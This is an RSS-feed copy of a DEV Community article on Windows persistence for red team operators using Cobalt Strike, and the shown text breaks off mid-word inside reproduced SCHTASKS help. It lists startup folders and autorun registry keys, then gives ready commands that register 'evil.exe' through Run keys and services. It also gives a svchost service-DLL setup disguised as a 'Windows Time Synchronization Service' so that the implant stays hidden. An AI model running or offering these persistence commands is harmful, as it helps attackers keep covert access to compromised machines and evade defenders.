DEV Community: Excalibra The latest articles on DEV Community by Excalibra (@excalibra). https://dev.to/excalibra https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2465115%2F44e01ea7-d2d5-4532-8d8a-4a94ebf19e42.jpg DEV Community: Excalibra https://dev.to/excalibra en Windows Persistence Techniques Excalibra Wed, 10 Jun 2026 08:44:21 +0000 https://dev.to/excalibra/windows-persistence-techniques-53p8 https://dev.to/excalibra/windows-persistence-techniques-53p8 <h2> 0x00 Preface and Scenario </h2> <p>In red team operations, it is currently common practice to use Cobalt Strike (CS) for unified management of acquired shells or phished targets. However, practical experience reveals that CS does not natively integrate a one‑click persistence function. Many third‑party plugins developed by the community are either incomplete or cumbersome to use, and some even contain bugs that give a false impression of success, ultimately resulting in the loss of the shell.<br><br> Consequently, this article collates persistence methods within the Windows environment based on the aforementioned scenario. Subsequently, a selection of the more frequently employed and convenient operations will be integrated into a CS plugin to ensure that access is rapidly maintained immediately after a shell is obtained.</p> <h2> 0x01 Startup Directory </h2> <p><strong>Required Privileges:</strong> With or without elevation.<br><br> This is the most common and simplest method of persistence. Programmes or shortcuts placed in this directory execute automatically when a user logs in.<br><br> For NT6 and later, the directories are as follows:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">Current</span> <span class="kd">user</span>: <span class="kd">C</span>:\Users\Username\AppData\Roaming\Microsoft\Windows\Start <span class="kd">Menu</span>\Programs\Startup <span class="kd">All</span> <span class="kd">users</span>: <span class="kd">C</span>:\ProgramData\Microsoft\Windows\Start <span class="kd">Menu</span>\Programs\StartUp </code></pre> </div> <p>For pre‑NT6 systems:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">Current</span> <span class="kd">user</span>: <span class="kd">C</span>:\Documents <span class="kd">and</span> <span class="kd">Settings</span>\Hunter\Start <span class="kd">Menu</span>\Programs\Startup <span class="kd">All</span> <span class="kd">users</span>: <span class="kd">C</span>:\Documents <span class="kd">and</span> <span class="kd">Settings</span>\All <span class="kd">Users</span>\Start <span class="kd">Menu</span>\Programs\Startup </code></pre> </div> <h2> 0x02 Registry Keys </h2> <p><strong>Required Privileges:</strong> With or without elevation.<br><br> The extensive Windows registry and its relatively lax permission management provide numerous opportunities for manipulation. Among these, registry auto‑start entries are a frequently used persistence mechanism.<br><br> As the core database of Windows, the registry stores a wealth of critical system and user information. Windows provides two independent registry paths: <code>HKEY_CURRENT_USER</code> (HKCU), which pertains to the current user, and <code>HKEY_LOCAL_MACHINE</code> (HKLM), which corresponds to the physical machine and can be modified only by privileged accounts.<br><br> With the increasing awareness of security, most Windows machines compromised during red team engagements operate with reduced privileges. For example, elevating privileges on a phished PC is often unnecessary; even if an Administrator’s startup entry is written after elevation, the user will still log into their own account on the next session, rendering the persistence ineffective.<br><br> All relevant registry keys for Windows persistence are enumerated below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1. Load Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load 2. Userinit Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit This key normally contains userinit.exe. It permits multiple programmes separated by commas, e.g. userinit.exe,evil.exe. 3. Explorer\Run Key The Explorer\Run key exists under both HKCU and HKLM. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 4. RunServicesOnce Key This key starts service programmes before user logon and prior to other programmes launched via registry keys. It exists under both HKCU and HKLM. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 5. RunServices Key Programmes specified here run immediately after those from RunServicesOnce, but both execute before user logon. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 6. RunOnce\Setup Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 7. RunOnce Key Installation programmes typically use the RunOnce key to auto‑start. Its locations are: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce [Pre‑NT6] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce The HKLM RunOnce key runs immediately after user logon, before other Run keys; the HKCU RunOnce key runs after the operating system has processed other Run keys and the Startup folder. 8. Run Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Run is the most commonly employed auto‑start key. The HKCU Run key executes after the HKLM Run key, but both are processed before the Startup folder. </code></pre> </div> <p>Command to write a registry key:<br><br> <code>reg add "XXXX" /v evil /t REG_SZ /d "[Absolute Path]\evil.exe"</code></p> <h2> 0x03 Services </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction.<br><br> Creating a service requires non‑reduced administrator rights; therefore, privilege escalation is a prerequisite for this persistence method. However, it offers higher stealth compared to registry keys (e.g. loading a DLL via svchost service groups can conceal the malicious process). Both CMD and PowerShell can add services with commands. Example:</p> <p><code>sc create evil binpath= "cmd.exe /k [Absolute Path]evil.exe" start= "auto" obj= "LocalSystem"</code></p> <p>This straightforward approach launches a service via cmd. A minor pitfall exists: a shellcode loader that blocks the main thread may cause the service to appear unresponsive during startup and fail. Hence, invoking cmd is mandatory; the service cannot be created directly. Upon successful start, the process runs with SYSTEM privileges before user logon. The obvious drawback is that the malicious process remains a distinct entity, reducing stealth, as illustrated below:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5ymfskoe35ayg6f6qj5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5ymfskoe35ayg6f6qj5.png" alt=" " width="796" height="211"></a></p> <p>Another category of services is launched through svchost. Numerous Windows services are loaded by injecting into this host process (a Microsoft‑sanctioned DLL injection mechanism). Consequently, if the DLL itself evades detection, antivirus software will ignore this behaviour; moreover, as the malicious process is not standalone, stealth is enhanced.<br><br> However, loading a service via svchost cannot be accomplished with a single command. It requires crafting a service DLL and adding extra registry entries. Because 64‑bit systems have dual registry views and two svchost instances, the commands differ slightly.<br><br> Commands for 32‑bit systems:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">sc</span> <span class="kd">create</span> <span class="kd">TimeSync</span> <span class="kd">binPath</span><span class="o">=</span> <span class="s2">"C:\Windows\System32\svchost.exe -k netsvr"</span> <span class="nb">start</span><span class="o">=</span> <span class="kd">auto</span> <span class="kd">obj</span><span class="o">=</span> <span class="kd">LocalSystem</span> <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync\Parameters <span class="na">/v </span><span class="kd">ServiceDll</span> <span class="na">/t </span><span class="kd">REG_EXPAND_SZ</span> <span class="na">/d </span><span class="s2">"C:\Users\hunter\Desktop\localService32.dll"</span> <span class="na">/f /reg</span>:32 <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync <span class="na">/v </span><span class="kd">Description</span> <span class="na">/t </span><span class="kd">REG_SZ</span> <span class="na">/d </span><span class="s2">"Windows Time Synchronization Service"</span> <span class="na">/f /reg</span>:32 <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync <span class="na">/v </span><span class="kd">DisplayName</span> <span class="na">/t </span><span class="kd">REG_SZ</span> <span class="na">/d </span><span class="s2">"TimeSyncSrv"</span> <span class="na">/f /reg</span>:32 <span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"</span> <span class="na">/v </span><span class="kd">netsvr</span> <span class="na">/t </span><span class="kd">REG_MULTI_SZ</span> <span class="na">/d </span><span class="kd">TimeSync</span> <span class="na">/f /reg</span>:32 <span class="nb">sc</span> <span class="nb">start</span> <span class="kd">TimeSync</span> </code></pre> </div> <p>Commands for registering a 32‑bit service on 64‑bit systems:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">sc</span> <span class="kd">create</span> <span class="kd">TimeSync</span> <span class="kd">binPath</span><span class="o">=</span> <span class="s2">"C:\Windows\Syswow64\svchost.exe -k netsvr"</span> <span class="nb">start</span><span class="o">=</span> <span class="kd">auto</span> <span class="kd">obj</span><span class="o">=</span> <span class="kd">LocalSystem</span> <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync\Parameters <span class="na">/v </span><span class="kd">ServiceDll</span> <span class="na">/t </span><span class="kd">REG_EXPAND_SZ</span> <span class="na">/d </span><span class="s2">"C:\Users\hunter\Desktop\localService32.dll"</span> <span class="na">/f /reg</span>:32 <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync <span class="na">/v </span><span class="kd">Description</span> <span class="na">/t </span><span class="kd">REG_SZ</span> <span class="na">/d </span><span class="s2">"Windows Time Synchronization Service"</span> <span class="na">/f /reg</span>:32 <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync <span class="na">/v </span><span class="kd">DisplayName</span> <span class="na">/t </span><span class="kd">REG_SZ</span> <span class="na">/d </span><span class="s2">"TimeSyncSrv"</span> <span class="na">/f /reg</span>:32 <span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"</span> <span class="na">/v </span><span class="kd">netsvr</span> <span class="na">/t </span><span class="kd">REG_MULTI_SZ</span> <span class="na">/d </span><span class="kd">TimeSync</span> <span class="na">/f /reg</span>:32 <span class="nb">sc</span> <span class="nb">start</span> <span class="kd">TimeSync</span> </code></pre> </div> <p>Commands for native 64‑bit services:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">sc</span> <span class="kd">create</span> <span class="kd">TimeSync</span> <span class="kd">binPath</span><span class="o">=</span> <span class="s2">"C:\Windows\System32\svchost.exe -k netsvr"</span> <span class="nb">start</span><span class="o">=</span> <span class="kd">auto</span> <span class="kd">obj</span><span class="o">=</span> <span class="kd">LocalSystem</span> <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync\Parameters <span class="na">/v </span><span class="kd">ServiceDll</span> <span class="na">/t </span><span class="kd">REG_EXPAND_SZ</span> <span class="na">/d </span><span class="s2">"C:\Users\hunter\Desktop\localService32.dll"</span> <span class="na">/f /reg</span>:64 <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync <span class="na">/v </span><span class="kd">Description</span> <span class="na">/t </span><span class="kd">REG_SZ</span> <span class="na">/d </span><span class="s2">"Windows Time Synchronization Service"</span> <span class="na">/f /reg</span>:64 <span class="nb">reg</span> <span class="kd">add</span> <span class="kd">HKLM</span>\SYSTEM\CurrentControlSet\services\TimeSync <span class="na">/v </span><span class="kd">DisplayName</span> <span class="na">/t </span><span class="kd">REG_SZ</span> <span class="na">/d </span><span class="s2">"TimeSyncSrv"</span> <span class="na">/f /reg</span>:64 <span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"</span> <span class="na">/v </span><span class="kd">netsvr</span> <span class="na">/t </span><span class="kd">REG_MULTI_SZ</span> <span class="na">/d </span><span class="kd">TimeSync</span> <span class="na">/f /reg</span>:64 <span class="nb">sc</span> <span class="nb">start</span> <span class="kd">TimeSync</span> </code></pre> </div> <p>A significant caveat: the <code>reg add</code> command overwrites existing registry values. Most keys under <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost</code> are of type <code>REG_MULTI_SZ</code> (multi‑string). Therefore, one must never write to an existing key, as it holds services essential for system boot; overwriting would cause severe issues. (Hence, the commands above use "netsvr", a key that does not exist by default.)</p> <h2> 0x04 Scheduled Tasks </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction, or standard user.<br><br> Scheduled tasks constitute another excellent persistence vector. Unlike auto‑start registry keys and services, scheduled tasks offer greater diversity and flexibility in configuration, and their location is relatively concealed (manual inspection requires several additional clicks). For instance, during security service engagements, the notorious "DriverLife" cryptominer employed persistence by creating multiple PowerShell scripts within scheduled tasks, with its stager directly embedded as a base64‑encoded argument in the command line. The input field is quite narrow, and less experienced engineers might easily overlook the trailing content.</p> <p>Windows provides the <code>SCHTASKS</code> command for managing scheduled tasks, with the following options:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">SCHTASKS</span> <span class="na">/parameter </span><span class="o">[</span><span class="kd">arguments</span><span class="o">]</span> <span class="kd">Description</span>: <span class="kd">Enables</span> <span class="kd">an</span> <span class="kd">administrator</span> <span class="kd">to</span> <span class="kd">create</span><span class="o">,</span> <span class="kd">delete</span><span class="o">,</span> <span class="nb">query</span><span class="o">,</span> <span class="nb">change</span><span class="o">,</span> <span class="nb">run</span><span class="o">,</span> <span class="kd">and</span> <span class="kd">end</span> <span class="kd">scheduled</span> <span class="kd">tasks</span> <span class="na">on</span> <span class="kd">a</span> <span class="kd">local</span> <span class="kd">or</span> <span class="kd">remote</span> <span class="kd">system</span>. <span class="kd">Parameter</span> <span class="kd">List</span>: <span class="na">/Create </span><span class="kd">Creates</span> <span class="kd">a</span> <span class="kd">new</span> <span class="kd">scheduled</span> <span class="kd">task</span>. <span class="na">/Delete </span><span class="kd">Deletes</span> <span class="kd">the</span> <span class="kd">scheduled</span> <span class="kd">task</span><span class="o">(</span><span class="kd">s</span><span class="o">)</span>. <span class="na">/Query </span><span class="kd">Displays</span> <span class="kd">all</span> <span class="kd">scheduled</span> <span class="kd">tasks</span>. <span class="na">/Change </span><span class="kd">Changes</span> <span class="kd">the</span> <span class="kd">properties</span> <span class="kd">of</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span>. <span class="na">/Run </span><span class="kd">Runs</span> <span class="kd">the</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="na">on</span> <span class="kd">demand</span>. <span class="na">/End </span><span class="kd">Stops</span> <span class="kd">the</span> <span class="kd">currently</span> <span class="kd">running</span> <span class="kd">scheduled</span> <span class="kd">task</span>. <span class="na">/ShowSid </span><span class="kd">Shows</span> <span class="kd">the</span> <span class="kd">security</span> <span class="kd">identifier</span> <span class="kd">corresponding</span> <span class="kd">to</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="kd">name</span>. /<span class="o">?</span> <span class="kd">Displays</span> <span class="kd">this</span> <span class="nb">help</span> <span class="kd">message</span>. </code></pre> </div> <p>For persistence, the <code>Create</code> parameter is most frequently used. Due to its numerous arguments, the full help text is reproduced below for reference:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">SCHTASKS</span> <span class="na">/Create </span><span class="o">[</span><span class="na">/S </span><span class="kd">system</span> <span class="o">[</span><span class="na">/U </span><span class="kd">username</span> <span class="o">[</span><span class="na">/P </span><span class="o">[</span><span class="kd">password</span><span class="o">]]]]</span> <span class="o">[</span><span class="na">/RU </span><span class="kd">username</span> <span class="o">[</span><span class="na">/RP </span><span class="kd">password</span><span class="o">]]</span> <span class="na">/SC </span><span class="kd">schedule</span> <span class="o">[</span><span class="na">/MO </span><span class="kd">modifier</span><span class="o">]</span> <span class="o">[</span><span class="na">/D </span><span class="kd">day</span><span class="o">]</span> <span class="o">[</span><span class="na">/M </span><span class="kd">months</span><span class="o">]</span> <span class="o">[</span><span class="na">/I </span><span class="kd">idletime</span><span class="o">]</span> <span class="na">/TN </span><span class="kd">taskname</span> <span class="na">/TR </span><span class="kd">taskrun</span> <span class="o">[</span><span class="na">/ST </span><span class="kd">starttime</span><span class="o">]</span> <span class="o">[</span><span class="na">/RI </span><span class="kd">interval</span><span class="o">]</span> <span class="o">[</span> <span class="o">{</span><span class="na">/ET </span><span class="kd">endtime</span> <span class="o">|</span> <span class="na">/DU </span><span class="kd">duration</span><span class="o">}</span> <span class="o">[</span><span class="na">/K</span><span class="o">]</span> <span class="o">[</span><span class="na">/XML </span><span class="kd">xmlfile</span><span class="o">]</span> <span class="o">[</span><span class="na">/V</span><span class="m">1</span><span class="o">]]</span> <span class="o">[</span><span class="na">/SD </span><span class="kd">startdate</span><span class="o">]</span> <span class="o">[</span><span class="na">/ED </span><span class="kd">enddate</span><span class="o">]</span> <span class="o">[</span><span class="na">/IT </span><span class="o">|</span> <span class="na">/NP</span><span class="o">]</span> <span class="o">[</span><span class="na">/Z</span><span class="o">]</span> <span class="o">[</span><span class="na">/F</span><span class="o">]</span> <span class="kd">Description</span>: <span class="kd">Allows</span> <span class="kd">an</span> <span class="kd">administrator</span> <span class="kd">to</span> <span class="kd">create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="na">on</span> <span class="kd">a</span> <span class="kd">local</span> <span class="kd">or</span> <span class="kd">remote</span> <span class="kd">system</span>. <span class="kd">Parameter</span> <span class="kd">List</span>: <span class="na">/S </span><span class="kd">system</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">remote</span> <span class="kd">system</span> <span class="kd">to</span> <span class="kd">connect</span> <span class="kd">to</span>. <span class="kd">If</span> <span class="kd">omitted</span><span class="o">,</span> <span class="kd">the</span> <span class="kd">local</span> <span class="kd">system</span> <span class="kd">is</span> <span class="kd">used</span>. <span class="na">/U </span><span class="kd">username</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">user</span> <span class="kd">context</span> <span class="kd">under</span> <span class="kd">which</span> <span class="kd">SchTasks</span><span class="err">.exe</span> <span class="kd">should</span> <span class="kd">execute</span>. <span class="na">/P </span><span class="o">[</span><span class="kd">password</span><span class="o">]</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">password</span> <span class="k">for</span> <span class="kd">the</span> <span class="kd">given</span> <span class="kd">user</span> <span class="kd">context</span>. <span class="kd">Prompts</span> <span class="k">for</span> <span class="kd">input</span> <span class="k">if</span> <span class="kd">omitted</span>. <span class="na">/RU </span><span class="kd">username</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="s2">"run as"</span> <span class="kd">user</span> <span class="kd">account</span> <span class="o">(</span><span class="kd">user</span> <span class="kd">context</span><span class="o">)</span> <span class="kd">under</span> <span class="kd">which</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">runs</span>. <span class="kd">For</span> <span class="kd">the</span> <span class="kd">system</span> <span class="kd">account</span><span class="o">,</span> <span class="kd">valid</span> <span class="kd">values</span> <span class="kd">are</span> <span class="s2">""</span><span class="o">,</span> <span class="s2">"NT AUTHORITY\SYSTEM"</span><span class="o">,</span> <span class="kd">or</span> <span class="s2">"SYSTEM"</span>. <span class="kd">For</span> <span class="kd">v2</span> <span class="kd">tasks</span><span class="o">,</span> <span class="s2">"NT AUTHORITY\LOCALSERVICE"</span><span class="o">,</span> <span class="s2">"NT AUTHORITY\NETWORKSERVICE"</span><span class="o">,</span> <span class="kd">and</span> <span class="kd">common</span> <span class="kd">SIDs</span> <span class="kd">are</span> <span class="kd">also</span> <span class="kd">available</span>. <span class="na">/RP </span><span class="o">[</span><span class="kd">password</span><span class="o">]</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">password</span> <span class="k">for</span> <span class="kd">the</span> <span class="s2">"run as"</span> <span class="kd">user</span>. <span class="kd">To</span> <span class="nb">prompt</span> <span class="k">for</span> <span class="kd">the</span> <span class="kd">password</span><span class="o">,</span> <span class="kd">the</span> <span class="kd">value</span> <span class="kd">must</span> <span class="kd">be</span> <span class="s2">"*"</span> <span class="kd">or</span> <span class="kd">none</span>. <span class="kd">The</span> <span class="kd">password</span> <span class="kd">is</span> <span class="kd">ignored</span> <span class="k">for</span> <span class="kd">the</span> <span class="kd">system</span> <span class="kd">account</span>. <span class="kd">Must</span> <span class="kd">be</span> <span class="kd">used</span> <span class="kd">with</span> <span class="na">/RU </span><span class="kd">or</span> <span class="na">/XML</span>. <span class="na">/SC </span><span class="kd">schedule</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">schedule</span> <span class="kd">frequency</span>. <span class="kd">Valid</span> <span class="kd">schedule</span> <span class="kd">types</span>: <span class="kd">MINUTE</span><span class="o">,</span> <span class="kd">HOURLY</span><span class="o">,</span> <span class="kd">DAILY</span><span class="o">,</span> <span class="kd">WEEKLY</span><span class="o">,</span> <span class="kd">MONTHLY</span><span class="o">,</span> <span class="kd">ONCE</span><span class="o">,</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span><span class="o">,</span> <span class="kd">ONEVENT</span>. <span class="na">/MO </span><span class="kd">modifier</span> <span class="kd">Refines</span> <span class="kd">the</span> <span class="kd">schedule</span> <span class="nb">type</span> <span class="kd">to</span> <span class="kd">allow</span> <span class="kd">finer</span> <span class="kd">control</span> <span class="kd">over</span> <span class="kd">recurrence</span>. <span class="kd">Valid</span> <span class="kd">values</span> <span class="kd">are</span> <span class="kd">listed</span> <span class="k">in</span> <span class="kd">the</span> <span class="s2">"Modifiers"</span> <span class="kd">section</span> <span class="kd">below</span>. <span class="na">/D </span><span class="kd">days</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">day</span><span class="o">(</span><span class="kd">s</span><span class="o">)</span> <span class="kd">of</span> <span class="kd">the</span> <span class="kd">week</span> <span class="kd">to</span> <span class="nb">run</span> <span class="kd">the</span> <span class="kd">task</span>. <span class="kd">Valid</span> <span class="kd">values</span>: <span class="kd">MON</span><span class="o">,</span> <span class="kd">TUE</span><span class="o">,</span> <span class="kd">WED</span><span class="o">,</span> <span class="kd">THU</span><span class="o">,</span> <span class="kd">FRI</span><span class="o">,</span> <span class="kd">SAT</span><span class="o">,</span> <span class="kd">SUN</span><span class="o">,</span> <span class="kd">and</span> <span class="k">for</span> <span class="kd">MONTHLY</span> <span class="kd">schedules</span> <span class="m">1</span>–31 <span class="o">(</span><span class="kd">day</span> <span class="kd">of</span> <span class="kd">month</span><span class="o">)</span>. <span class="kd">Wildcard</span> <span class="s2">"*"</span> <span class="kd">specifies</span> <span class="kd">all</span> <span class="kd">days</span>. <span class="na">/M </span><span class="kd">months</span> <span class="kd">Specifies</span> <span class="kd">month</span><span class="o">(</span><span class="kd">s</span><span class="o">)</span> <span class="kd">of</span> <span class="kd">the</span> <span class="kd">year</span>. <span class="kd">Defaults</span> <span class="kd">to</span> <span class="kd">the</span> <span class="kd">first</span> <span class="kd">day</span> <span class="kd">of</span> <span class="kd">the</span> <span class="kd">month</span>. <span class="kd">Valid</span> <span class="kd">values</span>: <span class="kd">JAN</span><span class="o">,</span> <span class="kd">FEB</span><span class="o">,</span> <span class="kd">MAR</span><span class="o">,</span> <span class="kd">APR</span><span class="o">,</span> <span class="kd">MAY</span><span class="o">,</span> <span class="kd">JUN</span><span class="o">,</span> <span class="kd">JUL</span><span class="o">,</span> <span class="kd">AUG</span><span class="o">,</span> <span class="kd">SEP</span><span class="o">,</span> <span class="kd">OCT</span><span class="o">,</span> <span class="kd">NOV</span><span class="o">,</span> <span class="kd">DEC</span>. <span class="kd">Wildcard</span> <span class="s2">"*"</span> <span class="kd">specifies</span> <span class="kd">all</span> <span class="kd">months</span>. <span class="na">/I </span><span class="kd">idletime</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">amount</span> <span class="kd">of</span> <span class="kd">idle</span> <span class="nb">time</span> <span class="kd">to</span> <span class="kd">wait</span> <span class="kd">before</span> <span class="kd">running</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">ONIDLE</span> <span class="kd">task</span>. <span class="kd">Valid</span> <span class="kd">range</span>: <span class="m">1</span> <span class="kd">to</span> <span class="m">999</span> <span class="kd">minutes</span>. <span class="na">/TN </span><span class="kd">taskname</span> <span class="kd">Specifies</span> <span class="kd">a</span> <span class="kd">name</span> <span class="kd">that</span> <span class="kd">uniquely</span> <span class="kd">identifies</span> <span class="kd">this</span> <span class="kd">scheduled</span> <span class="kd">task</span>. <span class="na">/TR </span><span class="kd">taskrun</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="nb">path</span> <span class="kd">and</span> <span class="kd">file</span> <span class="kd">name</span> <span class="kd">of</span> <span class="kd">the</span> <span class="kd">programme</span> <span class="kd">to</span> <span class="nb">run</span> <span class="nb">at</span> <span class="kd">the</span> <span class="kd">scheduled</span> <span class="nb">time</span>. <span class="kd">Example</span>: <span class="kd">C</span>:\windows\system32\calc.exe <span class="na">/ST </span><span class="kd">starttime</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="nb">start</span> <span class="nb">time</span> <span class="kd">to</span> <span class="nb">run</span> <span class="kd">the</span> <span class="kd">task</span>. <span class="kd">Time</span> <span class="nb">format</span> <span class="kd">is</span> <span class="kd">HH</span><span class="nl">:mm</span> <span class="o">(</span><span class="m">24</span>‑hour<span class="o">),</span> <span class="kd">e</span>.g. <span class="m">14</span>:30 <span class="k">for</span> <span class="m">2</span>:30 <span class="kd">PM</span>. <span class="kd">Defaults</span> <span class="kd">to</span> <span class="kd">current</span> <span class="nb">time</span> <span class="k">if</span> <span class="ow">not</span> <span class="kd">specified</span>. <span class="kd">Required</span> <span class="k">for</span> <span class="na">/SC </span><span class="kd">ONCE</span>. <span class="na">/RI </span><span class="kd">interval</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">repetition</span> <span class="kd">interval</span> <span class="k">in</span> <span class="kd">minutes</span>. <span class="kd">Not</span> <span class="kd">applicable</span> <span class="k">for</span> <span class="kd">schedule</span> <span class="kd">types</span>: <span class="kd">MINUTE</span><span class="o">,</span> <span class="kd">HOURLY</span><span class="o">,</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span><span class="o">,</span> <span class="kd">ONEVENT</span>. <span class="kd">Valid</span> <span class="kd">range</span>: <span class="m">1</span>–599940 <span class="kd">minutes</span>. <span class="kd">If</span> <span class="na">/ET </span><span class="kd">or</span> <span class="na">/DU </span><span class="kd">is</span> <span class="kd">specified</span><span class="o">,</span> <span class="kd">the</span> <span class="kd">default</span> <span class="kd">is</span> <span class="m">10</span> <span class="kd">minutes</span>. <span class="na">/ET </span><span class="kd">endtime</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">end</span> <span class="nb">time</span> <span class="kd">to</span> <span class="nb">run</span> <span class="kd">the</span> <span class="kd">task</span>. <span class="kd">Time</span> <span class="nb">format</span> <span class="kd">HH</span><span class="nl">:mm</span><span class="o">,</span> <span class="kd">e</span>.g. <span class="m">14</span>:50 <span class="k">for</span> <span class="m">2</span>:50 <span class="kd">PM</span>. <span class="kd">Not</span> <span class="kd">applicable</span> <span class="k">for</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span><span class="o">,</span> <span class="kd">ONEVENT</span>. <span class="na">/DU </span><span class="kd">duration</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">duration</span> <span class="kd">to</span> <span class="nb">run</span> <span class="kd">the</span> <span class="kd">task</span>. <span class="kd">Time</span> <span class="nb">format</span> <span class="kd">HH</span><span class="nl">:mm</span>. <span class="kd">Not</span> <span class="kd">applicable</span> <span class="kd">with</span> <span class="na">/ET </span><span class="kd">or</span> <span class="kd">schedule</span> <span class="kd">types</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span><span class="o">,</span> <span class="kd">ONEVENT</span>. <span class="kd">For</span> <span class="na">/V</span><span class="m">1</span> <span class="kd">tasks</span><span class="o">,</span> <span class="k">if</span> <span class="na">/RI </span><span class="kd">is</span> <span class="kd">specified</span><span class="o">,</span> <span class="kd">duration</span> <span class="kd">defaults</span> <span class="kd">to</span> <span class="m">1</span> <span class="kd">hour</span>. <span class="na">/K </span><span class="kd">Terminates</span> <span class="kd">the</span> <span class="kd">task</span> <span class="nb">at</span> <span class="kd">the</span> <span class="kd">end</span> <span class="nb">time</span> <span class="kd">or</span> <span class="kd">duration</span>. <span class="kd">Not</span> <span class="kd">applicable</span> <span class="k">for</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span><span class="o">,</span> <span class="kd">ONEVENT</span>. <span class="kd">Must</span> <span class="kd">specify</span> <span class="na">/ET </span><span class="kd">or</span> <span class="na">/DU</span>. <span class="na">/SD </span><span class="kd">startdate</span> <span class="kd">Specifies</span> <span 